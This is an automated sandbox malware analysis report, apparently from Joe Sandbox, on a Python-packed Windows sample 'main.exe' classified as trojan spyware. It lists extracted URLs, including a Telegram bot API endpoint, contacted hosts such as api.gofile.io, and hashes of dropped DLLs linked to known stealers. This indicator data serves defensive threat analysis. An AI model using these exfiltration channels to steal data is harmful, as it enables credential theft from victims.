                                                                              http://ocsp.accv.esmain.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodemain.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://api.telegram.org/botpmain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamemain.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxymain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://docs.python.org/3/library/pprint.htmlmain.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://httpbin.org/getmain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894850000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985699146.000001E89484B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024088246.000001E8947D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://amazon.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://crunchyroll.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://exiv2.org/tags.html)main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/python-pillow/Pillow/main.exe, 00000002.00000002.2027115983.000001E895370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessmain.exe, 00000002.00000003.1785741511.000001E8939DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978563125.000001E893A0C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012124595.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codemain.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://wwww.certigna.fr/autorites/0mmain.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readermain.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777434520.000001E89154A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/python/cpython/issues/86361.main.exe, 00000002.00000003.1781941357.000001E8933CD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975282383.000001E893359000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977491655.000001E89338A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1781656560.000001E893672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://mail.python.org/pipermail/python-dev/2012-June/120787.html.main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://ebay.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://httpbin.org/main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://wwww.certigna.fr/autorites/main.exe, 00000002.00000002.2024904909.000001E894A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://repository.swisssign.com/pmain.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlmain.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulemain.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesmain.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://palletsprojects.com/donatemain.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://playstation.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_symain.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpfalse
IP              Domain         Country        ASN    ASN Name     Malicious
208.95.112.1    ip-api.com     United States  53334  TUT-ASUS     false
45.112.123.126  api.gofile.io  Singapore      16509  AMAZON-02US  false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1579350
Start date and time:2024-12-21 21:50:34 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 35s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Run with higher sleep bypass
Number of analysed new started processes analysed:25
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:main.exe
Detection:MAL
Classification:mal92.troj.spyw.winEXE@40/137@2/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 42
• Number of non-executed functions: 71
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
No simulations
                                                                                                                                                                                                                                          AMAZON-02USnshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 52.25.84.238
                                                                                                                                                                                                                                          mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                          • 18.195.151.252
                                                                                                                                                                                                                                          sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                          • 13.50.244.72
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                          • 185.166.143.50
                                                                                                                                                                                                                                          nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 18.163.241.112
                                                                                                                                                                                                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                          • 18.183.188.74
                                                                                                                                                                                                                                          star.ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                          • 76.223.52.162
                                                                                                                                                                                                                                          nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 54.153.44.160
                                                                                                                                                                                                                                          nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                          • 18.163.241.121
                                                                                                                                                                                                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd
• chos.exe, Detection: malicious, Threat Name: Unknown
• ihost.exe, Detection: malicious, Threat Name: Python Stealer, Muck Stealer
• shost.exe, Detection: malicious, Threat Name: Python Stealer, Muck Stealer
• lz4wnSavmK.exe, Detection: malicious, Threat Name: Python Stealer
• WVuXCNNYG0.exe, Detection: malicious, Threat Name: Python Stealer
• dipwo1iToJ.exe, Detection: malicious, Threat Name: Python Stealer
• ROh2ijuEpr.exe, Detection: malicious, Threat Name: Babuk, Conti
• zed.exe, Detection: malicious, Threat Name: Unknown
• back.ps1, Detection: malicious, Threat Name: Unknown
C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd
• chos.exe, Detection: malicious, Threat Name: Unknown
• ihost.exe, Detection: malicious, Threat Name: Python Stealer, Muck Stealer
• shost.exe, Detection: malicious, Threat Name: Python Stealer, Muck Stealer
• lz4wnSavmK.exe, Detection: malicious, Threat Name: Python Stealer
• WVuXCNNYG0.exe, Detection: malicious, Threat Name: Python Stealer
• dipwo1iToJ.exe, Detection: malicious, Threat Name: Python Stealer
• ROh2ijuEpr.exe, Detection: malicious, Threat Name: Babuk, Conti
• zed.exe, Detection: malicious, Threat Name: Unknown
• back.ps1, Detection: malicious, Threat Name: Unknown
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):11264
                                                                                                                                                                                                                                                                              Entropy (8bit):4.640339306680604
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:dLklddyTHThob0q/tJRrlDfNYSOcqgYCWt:ZgcdZq/JJD6gRWt
                                                                                                                                                                                                                                                                              MD5:BCD8CAAF9342AB891BB1D8DD45EF0098
                                                                                                                                                                                                                                                                              SHA1:EE7760BA0FF2548F25D764F000EFBB1332BE6D3E
                                                                                                                                                                                                                                                                              SHA-256:78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
                                                                                                                                                                                                                                                                              SHA-512:8B6FB53AECB514769985EBFDAB1B3C739024597D9C35905E04971D5422256546F7F169BF98F9BAF7D9F42A61CFF3EE7A20664989D3000773BF5EDA10CB3A0C24
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Joe Sandbox View:
• Filename: chos.exe, Detection: malicious
• Filename: ihost.exe, Detection: malicious
• Filename: shost.exe, Detection: malicious
• Filename: lz4wnSavmK.exe, Detection: malicious
• Filename: WVuXCNNYG0.exe, Detection: malicious
• Filename: dipwo1iToJ.exe, Detection: malicious
• Filename: ROh2ijuEpr.exe, Detection: malicious
• Filename: zed.exe, Detection: malicious
• Filename: back.ps1, Detection: malicious
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13824
                                                                                                                                                                                                                                                                              Entropy (8bit):5.0194545642425075
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:4t/1nCuqaL0kt7AznuRmceS4lDFhAlcqgcLg:F/k1ACln4lDogcLg
                                                                                                                                                                                                                                                                              MD5:F19CB847E567A31FAB97435536C7B783
                                                                                                                                                                                                                                                                              SHA1:4C8BFE404AF28C1781740E7767619A5E2D2FF2B7
                                                                                                                                                                                                                                                                              SHA-256:1ECE1DC94471D6977DBE2CEEBA3764ADF0625E2203D6257F7C781C619D2A3DAD
                                                                                                                                                                                                                                                                              SHA-512:382DC205F703FC3E1F072F17F58E321E1A65B86BE7D9D6B07F24A02A156308A7FEC9B1A621BA1F3428FD6BB413D14AE9ECB2A2C8DD62A7659776CFFDEBB6374C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Joe Sandbox View:
• Filename: chos.exe, Detection: malicious
• Filename: ihost.exe, Detection: malicious
• Filename: shost.exe, Detection: malicious
• Filename: lz4wnSavmK.exe, Detection: malicious
• Filename: WVuXCNNYG0.exe, Detection: malicious
• Filename: dipwo1iToJ.exe, Detection: malicious
• Filename: ROh2ijuEpr.exe, Detection: malicious
• Filename: zed.exe, Detection: malicious
• Filename: back.ps1, Detection: malicious
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):13312
                                                                                                                                                                                                                                                                              Entropy (8bit):5.037456384995606
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:st/1nCuqaL0ktPMn1ENe3erKr5br0YbsiDw6a9lkOcqgRGd:p/kpMIodrXbsiDS95gRGd
                                                                                                                                                                                                                                                                              MD5:DC14677EA8A8C933CC41F9CCF2BEDDC1
                                                                                                                                                                                                                                                                              SHA1:A6FB87E8F3540743097A467ABE0723247FDAF469
                                                                                                                                                                                                                                                                              SHA-256:68F081E96AE08617CF111B21EDED35C1774A5EF1223DF9A161C9445A78F25C73
                                                                                                                                                                                                                                                                              SHA-512:3ABA4CFCBBE4B350AB3230D488BD75186427E3AAAF38D19E0E1C7330F16795AD77FB6E26FF39AF29EAF4F5E8C42118CB680F90AFBFCA218AEDA64DC444675BA2
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14336
                                                                                                                                                                                                                                                                              Entropy (8bit):5.09191874780435
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:rMVsiXeqVb0lIb0Pj5Jdfpm68WZDInU282tacqgYLg:rM7ali0Pj5JxCaDuUlgYLg
                                                                                                                                                                                                                                                                              MD5:C09BB8A30F0F733C81C5C5A3DAD8D76D
                                                                                                                                                                                                                                                                              SHA1:46FD3BA87A32D12F4EE14601D1AD73B78EDC81D1
                                                                                                                                                                                                                                                                              SHA-256:8A1B751DB47CE7B1D3BD10BEBFFC7442BE4CFB398E96E3B1FF7FB83C88A8953D
                                                                                                                                                                                                                                                                              SHA-512:691AC74FAE930E9CEABE782567EFB99C50DD9B8AD607DD7F99A5C7DF2FA2BEB7EDFE2EBB7095A72DA0AE24E688FBABD340EAE8B646D5B8C394FEE8DDD5E60D31
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):36352
                                                                                                                                                                                                                                                                              Entropy (8bit):6.541423493519083
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:f/UlZA5PUEllvxL/7v/iKBt5ByU0xGitqzSEkxGG7+tpKHb/LZ7fr52EkifcMxme:klcR7JriEbwDaS4j990th9VDBV
                                                                                                                                                                                                                                                                              MD5:0AB25F99CDAACA6B11F2ECBE8223CAD5
                                                                                                                                                                                                                                                                              SHA1:7A881B3F84EF39D97A31283DE6D7B7AE85C8BAE6
                                                                                                                                                                                                                                                                              SHA-256:6CE8A60D1AB5ADC186E23E3DE864D7ADF6BDD37E3B0C591FA910763C5C26AF60
                                                                                                                                                                                                                                                                              SHA-512:11E89EEF34398DF3B144A0303E08B3A4CAF41A9A8CA618C18135F561731F285F8CF821D81179C2C45F6EEB0E496D9DD3ECF6FF202A3C453C80AFEF8582D06C17
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):15360
                                                                                                                                                                                                                                                                              Entropy (8bit):5.367749645917753
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:YiJBj5fq/Rk0kPLhOZ3UucCWuSKPEkA2bD9JXx03cqg5YUMLgs:/k1kTMZEjCWNaA2DTx0g5YUMLg
                                                                                                                                                                                                                                                                              MD5:B6EA675C3A35CD6400A7ECF2FB9530D1
                                                                                                                                                                                                                                                                              SHA1:0E41751AA48108D7924B0A70A86031DDE799D7D6
                                                                                                                                                                                                                                                                              SHA-256:76EF4C1759B5553550AB652B84F8E158BA8F34F29FD090393815F06A1C1DC59D
                                                                                                                                                                                                                                                                              SHA-512:E31FD33E1ED6D4DA3957320250282CFD9EB3A64F12DE4BD2DFE3410F66725164D96B27CAA34C501D1A535A5A2442D5F070650FD3014B4B92624EE00F1C3F3197
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                                                              Entropy (8bit):5.41148259289073
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:w3d9FkHaz0EJvrj+CYuz7ucc9dG7otDr22KcqgOiewZjW:YkHEJzj+X6769lDzagO/w
                                                                                                                                                                                                                                                                              MD5:F14E1AA2590D621BE8C10321B2C43132
                                                                                                                                                                                                                                                                              SHA1:FD84D11619DFFDF82C563E45B48F82099D9E3130
                                                                                                                                                                                                                                                                              SHA-256:FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
                                                                                                                                                                                                                                                                              SHA-512:A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20992
                                                                                                                                                                                                                                                                              Entropy (8bit):6.041302713678401
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
                                                                                                                                                                                                                                                                              MD5:B127CAE435AEB8A2A37D2A1BC1C27282
                                                                                                                                                                                                                                                                              SHA1:2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
                                                                                                                                                                                                                                                                              SHA-256:538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
                                                                                                                                                                                                                                                                              SHA-512:4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):24576
                                                                                                                                                                                                                                                                              Entropy (8bit):6.530656045206549
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
                                                                                                                                                                                                                                                                              MD5:2E15AA6F97ED618A3236CFA920988142
